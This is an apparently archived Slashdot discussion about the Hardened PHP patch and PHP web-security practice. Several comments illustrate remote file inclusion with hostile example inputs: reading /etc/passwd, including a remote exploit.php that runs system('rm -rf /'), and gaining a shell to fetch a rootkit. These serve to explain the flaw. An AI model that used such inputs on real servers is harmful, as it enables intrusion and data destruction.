On the server track the IP network that the cookie was set on, SERVER SIDE. When that cookie is used, and the computer is connecting from a different IP network require reauthentication. If you're more concerned about privacy, store the IP in the cookie, and some sort of one-way hash of it on the server then you can compare when they access the site. If it doesn't match, require them to reauthenticate. The whole purpose of this exercise is to prevent someone from using that cookie on another computer. This would be a bit of a hassle for mobile users, but still... Also always use a secure connection for authentication. If you use a cookie to allow a user to return, consider using two cookies, one which is for the main page which triggers a redirect to a secure page which then accepts the cookie to allow them into the site. Also at that point immediately destroy that old cookie, making it invalid, and reset with a new session ID and new verification info, and transmit it through this secure connection.

The whole point here is to make it more difficult for anybody looking at the packets flying around to find out this information and hijack that users session, and in effect compromising thier account. Other things to do are checks for the same account having multiple sessions at multiple locations, etc.

I have plenty of more thoughts on securing a web site, mainly e-commerce related. Yes you do more work to do all these checks, both programming and running it. But its worth it knowing that you're keeping things sane.

One other thing, anytime you do authentication, or anything with sensitive information, as soon as your script is done using that information, destroy those variables so that information is gone from RAM. The less time its sitting in RAM, the less chance there is for someone whose in that server to get it out of RAM. Of course this is improved tremendously if the server is configured to randomize the location of information in memory, since in this case it would be there for a fraction of a second in some random location--a little more difficult to get to I'd think.

Re:This is a Good Thing(R)

[gnu-generation-one]

"Well believe it or not, in a lot of cases, PHP code just cannot be trusted"

It would be nice to specify what you think a script's priviledges should be.

htpriviledges:
<Files *.php>
Database: Deny
Filesytem: allow
RemoteFiles: allow
Input-Cookies: deny
Input-Post: allow
</Files>

Really Now..

[FuzzyBad-Mofo]

From one of "Hardened PHP's" examples:

include $_REQUEST[$action];

Which is certainly a good example of what not to do; but if somebody's dumb enough to do something like this, likely no amount of engine protection is going to help them.

Re:Really Now..

[FuzzyBad-Mofo]

Doh, that should have been "include $_REQUEST['action'];", which allows the user to "include" any file they desire by manipulating the query string ala "insecure.php?action=/etc/passwd"

Re:Really Now..

[grazzy]

Well, whoever came up with the idea that include and require could take an URL as argument should be slapped ...

Re:Really Now..

[Icy]

This is were open_basedir comes in handy. open_basedir is set on the server to directories where including can occur. Its a pain to set up for each virtualhost, but it does help out.

Re:Really Now..

No, it's far worse than just reading "/etc/passwd", you could say "action=http://example.com/exploit.php", and PHP will happily (yet stupidly) execute the contents of "exploit.php", whatever that might be (say, "system('rm -rf /');" perhaps?).

Because PHP was written with security as a distant afterthought.

Re:Really Now..

[ziggamon]

I really don't get it. Please explain to me the possible hacking that can occur. Of course, apache does not have access to /etc/password. I mean, ok, it can be rather stupid, but what about include $_REQUEST[$action] . ".php"; ? Is that as much of a problem? It's not like I will be able to execute an external file as if it were my own... or am I being totally off here? I once had a site that allowed including this way, and I tried a whole number of things with it, the only result I could get was to make it ugly.

Re:Really Now..

[Trejkaz]

likely no amount of engine protection is going to help them.

Are you familiar with the concept of a sandbox? In Java, you could easily set up security permissions which prevent people doing malicious things like this. Even if the user did blah.jsp?page=/etc/passwd, if the JVM has no permissions to read that directory, all you will see is a security exception being thrown and the page not working as a result.

I don't see why this couldn't be implemented in a scripting language just as easily as it was implemented in Java.

Re:Really Now..

um, no it wont idiot.

when you require a remote file it executes the php code and sends the resulting html. The php code is ran on the remote host.

Next time RTFM before replying.

Re:Really Now..

[localekko]

But if that included URL outputs PHP code, it will be executed by the including script.

Re:Really Now..

Hey guy, guess what?

I just went and rtfm'd, and lo and behold:

When a file is included, parsing drops out of PHP mode and into HTML mode at the beginning of the target file, and resumes again at the end. For this reason, any code inside the target file which should be executed as PHP code must be enclosed within valid PHP start and end tags. [emphasis mine]

You'll note that they don't make a distinction between local or remote file inclusion, so if somone hosts a .txt file somewhere with valid php syntax (enclosed in start and end tags) your happy little server will be off and excuting someone else's code! Because in php security is a distant afterthought.

Though it's not like I really had to rtfm, though; all I had to do was read bugtraq for a few weeks and wait for yet another php remote file inclusion vulnerability.

Which one of us is the idiot?

Re:Really Now..

See my other comment. [the "idiot" remark at the end was directed at the comment's parent].

Basically, if you let anyone include any file they want, they can include arbitrary code on another server that PHP will execute.

Re:Really Now..

[Doppleganger]

That depends on whether the remote server is set up to execute the file.

If the remote server is set up to simply send the file as text, then the *local* server will execute the text. As a PHP script. As the local user. And your remote attacker has the ability to run any commands on the server that a local script could run (usually, "wget a rootkit from this other server, unzip it, and execute it...")

Re:Really Now..

[Monkeyman334]

Believe it or not PHP-Nuke had that exact behaviour about a year ago. The problem wasn't including ordinary files. The problem is with PHP you can include http files. So just make a request action=http://myserver/phpscript.php that had system() calls and you basically had a non interactive shell that could upload and execute files as the httpd user. Which is much closer to an exploit than including a /etc/passwd (which doesn't work in PHP either btw, unless the httpd user has read permissions on that file).

Re:Really Now..

Well, duh, that's why you secure your fucking webserver. The user that PHP runs under on mine is in a BSD jail with /bin/sh -> /bin/false. I'd like to see your 'system' calls doing anything useful through that...

Re:Really Now..

[rempelos]

There is no problem with URL arguments. Why shouldn't you be able to include a part of code from another server (when you know exactly what that is)?

However, who ever writes code like require($some_variable); with global_vars on or with $some_variable acquired from user interaction, should be slapped.

Re:Really Now..

that still doesn't stop your machine from becoming another ddos drone, spam relay, or open proxy. php has plenty of handy functions to pull files off the net and then execute them, or you could write it all in php.

though admittedly that's not a very realistic scenario since windows-based servers represent a much larger segment of the population and a much lower hanging fruit.

Re:Really Now..

also i don't think changing sh to point to /bin/false fixes anything, since php still has the ability to fork and exec (which is essentially what shells do anyways).

i'd double-check your assumption against exec(), which has this comment:

After tearing my hair out for eight hours, I finally figured out how to untar a file (yes, I know about fopen and sockets). You need to specify /bin/sh -c "command". For example: ...

that to me implies that exec() doesn't use /bin/sh (unlike system() which really uses popen(), which uses /bin/sh).

double check that assumption! you can never be too sure with php.

Re:Really Now..

[FuzzyBad-Mofo]

Which is much closer to an exploit than including a /etc/passwd

An excellent point. Please don't think too poorly of me, I was simply using a brief example. :)

Other PHP Hardening Sites

[Dozix007]

I run http://www.uberhacker.com . This site is dedicated to secure PHP programming. It is better to program secure rather than limit coding abilities. Secure programming allows for a wider range of scripts and security.

Re:Other PHP Hardening Sites

[seann]

"Webmasters get really mad when their sites are tampered with (not this one, I want you to give this site your best shot). If they really want to find out who broke into their site, they can. Keep in mind, if you are smart enough to break in, you better be even better to become anonymus."

Plz fix, kthxbye.

Re:Other PHP Hardening Sites

[Dozix007]

LOL... thanks. I still have some typo errors. When I initally setup this site, I probably did it in a few hours. Still working out the early kinks and typos. Thanks :)

FYI

[teko_teko]

Kung-fu comes from China, not Japan.

Re:Anyone else giggling?

No, it's far too subtle for Slashdot's legions of morons.

Not quite

[vlad_petric]

Make no mistakes - in 2001 a security paper claimed that ``it is very hard to write a secure PHP application (in the default configuration of PHP), even if you try''

``A Study In Scarlet - Exploiting Common Vulnerabilities in PHP'' [Clowes 2001]

PHP is probably slightly better these days, but, just like Windoze, simply wasn't designed with security in mind. It's a language grown incrementally, designed to allow you to write websites very quickly. And yes, easy to use means that it attracts people who know very little about programming.

Conclusion: combination of insecure language plus low-quality developpers equals security disaster.

Re:Not quite

[Marcus+Green]

Can you suggest a language that is more secure and is designed for creating interactive web pages?

Re:Not quite

[vlad_petric]

Java Server Pages - jsp.

Its advantages: faster (java isn't slow, it has a slow startup, which for a server is hardly a big deal), because the code you write is going to be converted in machine code; scales better (PHP still doesn't provide connection pooling; pconnect doesn't count, btw); more secure (no buffer overflow b/c of java, can use security policies to restrict what your pages are doing)

Its disadvantage: well, you have to learn java. You can't just jump into writing jsp pages, as you'd do with php. But I can equally argue that that's an advantage as well, as it increases the quality of code.

Re:Not quite

ASP.NET:
+ All form data is encoded by default to prevent script injection.
+ ADO.NET supports parameterized SQL to prevent SQL injection.

Re:Not quite

[snillfisk]

While all aspiring PHP-programmers should take the time to read the paper mentioned to understand why and how -- and to guard themselves against doing the same mistakes that we've all grown accustomed to over the years, it should be mentioned that almost all these default attack vectors has been taken care of during the years.

the default installation of PHP today makes people write a lot more robust code than it used to do. New applications has been able to move away from the 'ugly' things and a general understanding of what not to do has been developed by almost all active developers. If you've done serious PHP developement during the last years, you know how much further things has come.

Re:Not quite

[passion]

The super-global variables were first available in php4.0 beta 4 (released 2/2000), and were upgraded in 4.1 (12/2001), for further information, see PHP's ChangeLog.

The biggest change this created was discouraging people from using register_globals - probably the biggest security hazard until that time with writing php. This has been turned off by default since then, but unfortunately I'm still seeing developers rely upon this awful feature.

This doesn't make php bad, it makes those who write with that feature bad programmmers. Just because you can plow over a pedestrian with your car, it doesn't mean that everyone should have their car taken away... it just means that they're crappy drivers.

Re:Not quite

This doesn't make php bad, it makes those who write with that feature bad programmmers. Just because you can plow over a pedestrian with your car, it doesn't mean that everyone should have their car taken away... it just means that they're crappy drivers.

Sure. But if someone invented a cheap, safe, and reliable system that would make cars automatically avoid pedestrians, I'd hope it would become a legal requirement to use it, however good or bad a driver you are.

Same goes for code. There is absolutely no excuse for using C any more outside the very lowest of the low level routines; there are numerous other languages which are much safer and almost as fast. Sure, a "good programmer" can write secure code in C. That doesn't mean he isn't even less likely to write vulnerable code in a safer language.

It's like a good soldier can be trusted not to fire his gun by mistake - but I'd be pretty surprised to learn the army didn't still require him to leave the safety catch on while walking through a crowd of peaceful civilians a hundred miles behind the front line. Security is about making sure not even impossible accidents will happen.

Re:Not quite

[dTb]

Have you tried Jakarta Tapestry?

Re:Not quite

[julesh]

The register_globals problem isn't likely to go away any time soon. The problem is this:

1. There are lots of PHP scripts that require register_globals on, as until relatively recently that was the default setting.
2. Because ISPs need to offer compatibility, most ISPs have register_globals on, so that the scripts mentioned in (1) can be used.
3. Because most ISPs have register_globals on, there is little point in programmers not using the facility it provides. The insecurity is inherent in it being switched on, not in actually using the variables that are created.
4. Thus, more scripts are still being written that require register_globals, and the cycle perpetuates itself.

Re:Not quite

[julesh]

PHP still doesn't provide connection pooling; pconnect doesn't count, btw

OK -- why not?

(Note, I know next to nothing about how Java's connection pooling works, and only a little about PHP's, but I'm really interested to find out).

no buffer overflow b/c of java

I'm fairly sure buffer overflows are impossible in PHP code too. Although of course some PHP internal functions may have buffer overflows. But the same might be true of native Java functions. You have to trust in both cases that such potential problems have been caught by your server vendor.

Re:Not quite

[Khazunga]

Java's VM memory hogging behaviour is unacceptable. The thing continually grows, it never shrinks. It goes on to the point that the server starts thrashing when other apps run. This prompted us to rewrite the web platform (rather large: 400k users) to run on PHP. It served the pages in ~1.5s and it spits them out in less than 0.2s now.

It's not lack of experience either. I've used Java since it became mainstream, circa '94. I was a heavy user for eight years, then switched to PHP. My veredict: Java has stopped in time. Intepreted languages have caught up and overtaken Java's spot.

Re:Not quite

[passion]

There are lots of PHP scripts that require register_globals on, as until relatively recently that was the default setting.

Well, it was strongly mentioned as a security issue on 10-Dec-2001 when version 4.1.0 was announced:

http://www.php.net/release_4_1_0.php

And it was turned off as a default with the 4.2.0 release on 22-Apr-2002 - two years ago.

http://www.php.net/ChangeLog-4.php#4.2.0

Version 4.2.0

* ATTENTION!! register_globals defaults to 'off' now !!!

Considering that php 4 was released in May 2000, that's half of it's current lifetime. That's when I stopped using register_global variables, and started writing code properly, instead of giving a bad name to php. It's not a terribly difficult thing to clean up either... it's just that most php authors these days are too lazy to deal with it.

Re:Not quite

[vlad_petric]

Did you actually limit its buffer with -Xmx ? I guess not, because if you did, thrashing would never occur (eventually you'd get an exception, but that's something else).

Anyway, the "continually growing" thing makes me think of a "soft leak" (e.g. you continually add stuff to a collection). If that's not the case, well, probably a faulty VM or a bad web server (Tomcat, for instance, is rather poorly written)

BTW, Java in 94 was bleeding-edge, it was only with 1.3 that it got truly mainstream.

Re:Not quite

[ahdeoz]

Java isn't slow but JSP is. Telll me one JSP server that properly caches, or can remain up and stable for more than a week. So you have slow startup combined with short lifetime. That really sucks.

Re:Not quite

Are you an idiot? Or perhaps you can't add (in that case hopefully you aren't a programmer). Perhaps Java was bleeding edge in 94, but he said that he worked with Java for 8 years! Was Java still bleeding edge eight years after 94?

Re:Not quite

[Khazunga]

Limiting the maximum heap size, either with command line or ulimit would cause exceptions when the memory usage hits the limit. Same problem, slightly different behaviour, same end result.

We started on using Tomcat, switched to Resin trying to solve performance problems. It was lots better with Resin, but the memory condition wasn't solved.

There's absolutely no reason not to isolate memory usage between requests, to avoid this kind of memory leak. PHP does it. It pays some a penalty because of session data (de)serialization, but the gains completely pay off. Anyhow, with good serialization code, and ramdiskfs/shmfs, session storage doesn't cost that much processing power.

As for dates, I started using Java on my second year in University. That'd be late '95. And no, it was not part of standard course curriculum. I had to fight a few teachers to be able to use Java instead of C here and there.

nice intent but wrong approach

[mabu]

There's a fine line between securing a base system and crippling functionality. I'm all for the Hardened project, but I think ultimately it's the programmer's responsibility to make sure their code is secure.

A better approach might be to create some sort of code-parser that examines PHP code and warns the programmer of possible bad habits. Of course this should be prefaced with a long disclaimer that such a system isn't foolproof but is a good idea to run on any code to make sure you haven't overlooked any obvious problems.

Re:nice intent but wrong approach

create some sort of code-parser that examines PHP code and warns the programmer of possible bad habits.

Have you ever seen the garbage the guys you are talking about manage to produce? PHP is a decent language but most of the popular scripts are pure spaghetti, we can only hope improvements to PHP5s object model will help buts lets not count on it.

Re:Other PHP Hardening Sites WHERE??

I like your idea, but I really DON'T SEE ANY information on how to write secure code. Perhaps a direct link? So, anyone know a better site or some books on how to write SECURE code.

Clickable link

http://www.uberhacker.com

A patch?

[mabu]

After going over the site, Hardened PHP appears to be a patch to the existing PHP. Why don't the authors just petition the folks developing PHP to include these patches in an upcoming version?

The problem I have with this project is that it's likely PHP-version dependent, and once you implement it, you have two different sources you have to synchronize code for (not unlike Apache+Mod_SSL). I'd rather not have twice as much work to incorporate these features if necessary.

Dynamic Porn

[Saeed+al-Sahaf]

Well, I can't speak for the first post, but from my experience at Internet Entertainment Group (ClubLove, went out of biz a few years ago), most of our pages WHERE dynamic. We had several hundred sites that all drew off the same database of picks (stored in a simply HUGE RAID named Cthulhu). Most of the sites where template driven, and heavily relied on generating galleries on the fly based on whatever theme of the particular site (cum shots, MILF, gay, cream pies, whatever...). We server it all off of 9 SGI machines running Irix...

Re:Dynamic Porn

[Saeed+al-Sahaf]

Oh, and we used Perl. PHP was at v. 3 or early 4, not-ready-for-prime-time. I think PHP is now, or will soon give peral a run for it's money as the best server-side web scripting language (insert Perl / PHP flames here...).

Re:Dynamic Porn

Am I the only that disagrees with your technique?

I understand that the galleries of pics have to be filtered from a single database for each site, but there is a better way to do this.

Instead of writing dynamic pages, write an application that produces static pages based on the database. Whenever your content changes, re-run the applications to get fresh static pages.

Dynamic pages are just way too much overhead for what you're trying to accomplish.

Re:Dynamic Porn

[Saeed+al-Sahaf]

This might be good. But really, it you have the computing power, does it matter? But also, for us, our catalog of images was constantly in flux, new galleries coming in, old galleries going out when our licensing expired (yup, major sites do license the material). But then again, I guess we could have set up a nightly cron job...

Re:Dynamic Porn

It's written all over the walls... in almost every major book or tutorial for PHP: first viewer generates the page, the page gets cached and written to the disk, every other viewer gets to see the cached page. Not that hard... And if you need dinamic generated text on the page, well... don't do it or think of something clever ;)

Re:Dynamic Porn

Like SSI. They should be much faster than DB queries and all that stuff....
I've done something similar for a major german bank.
They had a lot of different rates that were stored in a db. I extracted them an put them in small static files that would only change every couple of days. These were included as SSIs into the pages. So you could have a huge (and changing) number of pages that all reffered to the same central rates from the db without causing db load.

P.S. Sorry for posting as a "coward" - i'm just too lazy to set up an account... ;-)

Re:Other PHP Hardening Sites WHERE??

[Dozix007]

Check out http://www.uberhacker.com/cgi-bin/index.php?page=g uide

I dont get this

[cyberlotnet]

Tons of complaints about how php programmers should program better, how php sucks, this and that..

Yet just the other day people where bitching about Fedora not having SELinux on by default.

PHP - Hardened PHP
Fedora - "Hardened Fedora"

Its really the same thing. Instead of fixing root flaws we through more security over them hoping it will stop then next hacker..

Linus must really suck at kernel programming if we have to do things like this..

No he doesn't Linus rocks, I cheer for every single developer that has ever submitted a patch to the kernel.

Fact of the matter is this..

WE ARE HUMAN.. TO BE HUMAN IS TO ERR.

Yes the programmers, be it php exploits or the next kernel buffer overflow make mistakes.. Does that mean they are bad programmers.. HELL NO..

Are there a lot of bad PHP programmers, yes.. I bet there are a lot of bad C programmers out there as well. We are just lucky they dont get to commit changes to the kernel or we would all be FUBAR.

Re:I dont get this

Not being nit picky but for future reference the quote goes "To Err is Human" not "To Be Human is to Err".

Re:I dont get this

[Lord+Bitman]

somebody isnt a programmer :)

Thing is...

[DarkHelmet]

PHP *can* run in a suexec environment. But to do that, you have to make your php run as cgi-bin.

This isn't exactly the greatest thing for performance. Not to mention having to put a !#/usr/bin/php on the top of each file.

I'm sure some mod_rewrite work could pipe all php file extensions to one script that would do a require on the file, eliminating the need for that string on the top. What a pain in the ass, though.

So your statement should read: wouldn't it be a lot more useful if they found an ingeneous way to have PHP scripts run properly with suexec and mod_php?

I, for one, would like that. It's shitty about how many hosting companies who run shared accounts make it easy for other people on the machine to sniff my Database server password.

uberhacker is crap

[Sepodati]

There's nothing but crap on that site. I heard about it before when you spammed some site I read. You teach poor programming skills and barely touch on anything that's useful towards security.

Your "gauntlet" challenge is probably a scam to get people to write scripts for you. You can't even handle your own PHP errors gracefully and run everything through an index.php page...

Please come back when you have something useful.

---John Holmes...

Re:uberhacker is crap

[Dozix007]

You sound a bit disgruntled. First off, the Gauntlete challenge is to promote secure scripting, something that is nearly nonexistant on the internet today. Second, routing everything through the index is more efficent, secure, and organized. And third, I would never spam any site about Uberhacker.Com . I have talked to people about it, and the site was posted on Slashdot, that is all. You need to learn a bit more before you open your mouth.

Not likely to get many replies

Not many folks will qualify as knowing both. From my perspective, PHP was stable (MOD_PERL, several years back, was twitchy) and considerably simpler. Remember that to much of the programming world, Perl is weird.

Umm..

[jvollmer]

Wouldn't that make it HPHP?

If it's not Consolidated Lint, it's just fuzz!

Nothing wrong running everything through index.php

[Phil+John]

have you ever used the fusebox methedology?

Although it may be nicer to use mod_rewrite to be able to use friendly url's

For instance in my companies e-commerce web app you can either use:

http://www.site.url/index.php?fuseaction=shop.cate gory&categoryid=xxx

http://www.site.url/index.php/fuseaction/shop.cate gory/categoryid/xxx

or http://www.site.url/shop.category/categoryid/xxx

Whatever, they all get piped through index.php through which then puts them through to the relevant circuit (i.e. shop) and fuse(action) (i.e. category).

Perspective

[cnf]

I think it is funny how most /. readers demonstrate how they think from a user perspective, and not from an admin perspective.

Now don't get me wrong, I understand, it's *hard* to think as an admin if you have never *been* one. But when you are an admin on a machine, you don't think "My users will just have to learn how to code secure, then there is no problem."
Sorry folks, just ain't gonna happen!
Joe home who wrote a site just to show off his holliday pictures thinks its swell how easy php is, and he doesn't really care about becoming fluent in php, as long as his little enviroment runs!

Sure, you can try and educate your user, but if you maintain a 500+ user server, security is in YOUR hands. only ONE of your users need make an error, and the whole machine might go down. And the "poor coding is the only reason for security holes" just doesnt cut it there.

Harden your servers, admins. Make the internet a fun place to be.

Errare humanum est,

[vlad_petric]

Perseverare diabolicum

It's human to err, but diabolic to persevere in your errors.

When I talk with php "developpers" who learnt it by example and without any formal programming background, it's extremely difficult to get past the "but it works very well this way ..."

There are many better alternatives to PHP

[voodoo1man]

A mini-language designed for one purpose will eventually become a general-purpose language (as PHP already has), and it doesn't mean it is well-designed in the first place (as my superficial familiarity with PHP tells me). That being said, there are many alternatives to PHP that work quite well.

The ones I'm most familiar with are extensions of Common Lisp. There are 3 CL web servers, each with dynamic HTML generation capability (AllegroServe, Araneida, CL-HTTP). Then there's Lisp Server Pages, Active Lisp Pages, etc., and another whole load of CGI solutions. I use (and highly recommend) AllegroServe. There is a whole big list over at Cliki (which runs on Araneida).

There are many CGI bindings for various Scheme implementations, and the PLT web server is kind of popular. I'm not very familiar with Scheme web solutions though, so I probably left something out.

There is a lot of activity with Smalltalk-based web apps. Seaside is a continuation-based framework that gets a lot of attention. There's also AIDA/Web, and an unfinished mod.Smalltalk. I am not very familiar with Smalltalk web solutions either, so I probably missed a few.

Python is a very popular option, and Zope seems to be a very popular framework. I don't know anything about web programming in Python aside from that.

Take pretty much any of the recent lightweight (in the conference meaning of the term) languages, and you're bound to find good options, almost all of them better in terms of security and speed than PHP; I can't think of a single one that has a more annoying syntax or more convoluted and limited semantics than PHP, though. Another thing that you should consider is the website we're posting on is pretty interactive, and kind of popular, and it's written in Perl.

Re:There are many better alternatives to PHP

[sbermunk]

I'm sorry, but I think you're nuts. Not to specifically knock the other choices you mention, but I think plenty of people feel that PHP has a far less annoying and convoluted syntax than say Perl or Lisp, which you seem to be advocating instead of PHP. And you say you have a "superficial familiarity" with PHP, yet knock PHP for a lack of Speed... Try it, you might be surprised (especially if you use a compilation cache like Turck MMCache). Why do you think every other random interpreted language is going to be way faster than PHP?
The only point I won't argue strongly is the security aspect. I don't think PHP is as bad as everyone is claiming if it is set up properly, but it isn't perfect - in particular too many ease-of-use features have been added that can chuck any semblance of security right out the window...

Re:There are many better alternatives to PHP

[voodoo1man]

I'm sorry, but I think you're nuts.

Thank you. :)

Not to specifically knock the other choices you mention, but I think plenty of people feel that PHP has a far less annoying and convoluted syntax than say Perl or Lisp, which you seem to be advocating instead of PHP.

Well, that is why I said "annoying," instead of "bad" or "stupid" or something absolute like that.

And you say you have a "superficial familiarity" with PHP, yet knock PHP for a lack of Speed... Try it, you might be surprised (especially if you use a compilation cache like Turck MMCache). Why do you think every other random interpreted language is going to be way faster than PHP?

When I don't know any better, I go by the Computer Language Shootout for data (unfortunately, it is the best I've yet to find). Turck MMCache sounds neat. My opinion of PHP's speed has a lot to do with my opinion of it's syntax and semantics - I think they would make compilation and optimizations unnecessarily difficult. Most other recent lightweight languages are more uniform in these respects, and I think it shows with the (relatively) good speed of their bytecode output.

The only point I won't argue strongly is the security aspect. I don't think PHP is as bad as everyone is claiming if it is set up properly, but it isn't perfect - in particular too many ease-of-use features have been added that can chuck any semblance of security right out the window...

This is the only point I didn't really raise, because I think that the security shortcomings of PHP can be fixed with better design and implementation without compromising any of it's other qualities or backwards compatibility (indeed, good design will only improve most of the other aspects of the language implementation).

Re:Nothing wrong running everything through index.

[imroy]

Ugh. God I hate seeing sites handled almost entirely out of index.php. Like an iceburg it's the publicly visible part of a very troubled language.

Try this for an ugly URL:

http://www.ogre3d.org/modules.php?op=modload&name= Sections&file=index&req=viewarticle&page=1&arttitl e=Features

Sorry to pick on the Ogre3D project. I've seen similar URL's around (in particlar on sourceforge projects) so it appears to be using one of the popular PHP theming packages. What an ugly abomination. I'm of the (strong) opinion that URLs should make sense and if possible, be memorable. It's a geek thing. I sometimes forget to bookmark pages or for whatever reason can't get an electronic version (email, text file, etc) to myself. I don't know how much URL's matter to non-geek users, but making things clearer would probably help everyone.

PHP seems to have no mechanism to handle "virtual" URLS (i.e not pointing directly to files), instead relying on the admin to use Apache's mod_rewrite module. Could some PHP coder enlighten me, is this really true? It seems very odd that a language (and runtime) supposedly designed specifically for web pages does not support this important feature.

Re:Nothing wrong running everything through index.

[Dozix007]

Well, understandable URLs can actually be a problem. I point out a tutorial on Uberhacker.Com that actually shows why it is. If someone is able to look at a URL and "understand" it, you can do quite a bit of damage. For example : somesite.com/index.php?cmd=del&msg=456 From looking at this somewhat "memorable" URL, it is easy to see what it does. Also, if the particular site has no protection with it's delete command, it would be easy to reak havoc across the site.

Re:Nothing wrong running everything through index.

[imroy]

To state the obvious, no shit. Of course you're going to have problems with the ficticious URL and system you presented. Somewhat of a straw-man argument there.

Now here's what I suggest: Don't combine "content" pages/scripts with "action" pages/scripts. What I mean is, have a script that does the adding/deleting/renaming/whatever and then does a 302 Temporary redirect (back) to the page/script that actually displays the data.

This has the following advantages:

• The "action" URL doesn't show up in the browser URL bar.
• It can't be bookmarked by accident.
• It won't even show up in the browse history and can't be accessed by hitting the "back" button (at least it doesn't on Mozilla, haven't checked other browsers).
• It makes your URLs and code clearer (code seperation and all).

As for authentication and protection, well that's a different matter. It doesn't really have much to do with URL's. Use cookies and even SSL to nail things down.

Probably a few reasons:

[Phil+John]

1) Some of these patches may introduce subtle bugs into interactions with 3rd party libraries (that covers pretty much most of the major function()s in PHP)

2) Some of these patches may introduce performance hits which would not be acceptable for some uses.

3) If you are running a large hosting company these patches may subtly break scripts being used by customers, tech supportality ensues.

4) Since this is a fairly new project, not even to a 1.0 release the pace of change may be so fast that it's more trouble than it's worth for the PHP and HPHP guys to keep making patch after patch as api's and such change. This way, the HPHP guys can toil away, making whatever internal changes they need to to achieve the securing of PHP.

I'm not saying this isn't a good idea, just I don't think it's the right time for this to happen, when the codebase has settled down maybe, but with the imminent move to the Zend Engine 2 and PHP 5 they may have to start from scratch (don't quote me on that however, it could be trivial for all I know!).

Did you actually read my post?

[Phil+John]

Just because things all go through index.php and are routed on from there in Fusebox doesn't make the url difficult to understand if you use mod_rewrite to pretty up (and make search engine safe) the url.

Seriously, have a look at Fusebox for PHP (or coldfusion, ASP or $favourite_scripting_language), it has increased productivity and code reuse in our company.

The other nice thing is naming conventions have you putting your "action/logic" code into files prepended with act_ and your display code into files prepended with dsp_, helping somewhat to enforce the notion of MVC. When used with a templating engine such as smarty however there is no other way to do it and one of my pet gripes with php (the mixing of logic and display) is banished forever :o)

Perfect Planning Prevents Piss Poor Performance

[elbazo]

Basically, plan, plan, plan is what I do. It helps me spot stupid errors that I have made before I code them.

Also, code slowly a bit at a time and always look at your project from a security point of view (unlike InvisionBoard, god that has so many holes in it) and find a compromise between features and security.

thats my 0.02

Re:Nothing wrong running everything through index.

[Dozix007]

First off, the index of that site handles content. That is all (I made it). Second, I could care less how obscure the links are. Bookmark it, or go to the site. All pages in my site (so far) are only three links deep. Second, if you are a secure scriptor in the first place, you will never run into any of those issues. Also, why does my code need to be clear to someone else ? I am the one using it, and if it is not clear to a Hacker, I have no problems.

And by extension... Windows Security!

[crashnbur]

Before someone else lashes out at Microsoft for analagous reasons, I don't think such an analogy would be entirely fair. While it is a server admin's responsibility to secure his/her server(s), and it is a software company's responsibility to secure its operating system(s), the tasks are not the same or even on the same level.

But to support cnf's point, I'm neither a server admin nor a software developer for Microsoft, and I'm watching South Park so I can't concentrate on explaining why it's not a good analogy... But I thought it was a good idea. :-P

"Safe programming" ain't that easy

[garyebickford]

I've been working on an article about fault tolerance, which is related to security in important ways. It all comes down to complexity. Computer science is, its essence, the management of complexity. A programming system of the size of PHP must incorporate as much support for fault tolerance at its own internal level of complexity as possible, because the system is too complex itself for any programmer to understand the security implications of all possible interactions between different components of the PHP runtime system, and all the libraries. In short, as several admins pointed out from their own point of view, you can't depend on your own code, much less that of 500 others on the same server.

Looking at the Documentation Page for Hardened PHP, the project is adding some very good changes to the underlying runtime environment and constraints on programmers. Based on my first glance I would be pleased, and not at all surprised, if some of these are incorporated into the main PHP in some form down the road, once it's been ironed out for a while. I'm glad to see folks actively using it.

As for the various mod-perl advocates who don't grok PHP, I personally dislike working in Perl, which seems to me to be a collection of all the things that were thrown out of other languages because they promote bad programming practice. That's OK, I understand it has power and flexibility, but Perl code too often looks like sneezing to me. Different strokes, see.

The security issues raised by this project are certainly matched by many of the same or equivalent ones in Perl. IMHO, both PHP and Perl have become too big. It is a truism that the probability of failure increases geometrically with the size of a system.

orion

[vlad_petric]

orionserver.com